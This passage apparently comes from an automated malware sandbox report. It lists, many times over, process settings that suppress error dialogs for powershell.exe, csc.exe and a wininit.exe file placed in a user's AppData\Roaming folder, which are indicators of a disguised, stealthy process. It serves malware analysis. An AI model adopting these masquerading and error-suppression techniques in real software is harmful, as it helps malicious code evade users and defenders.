                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
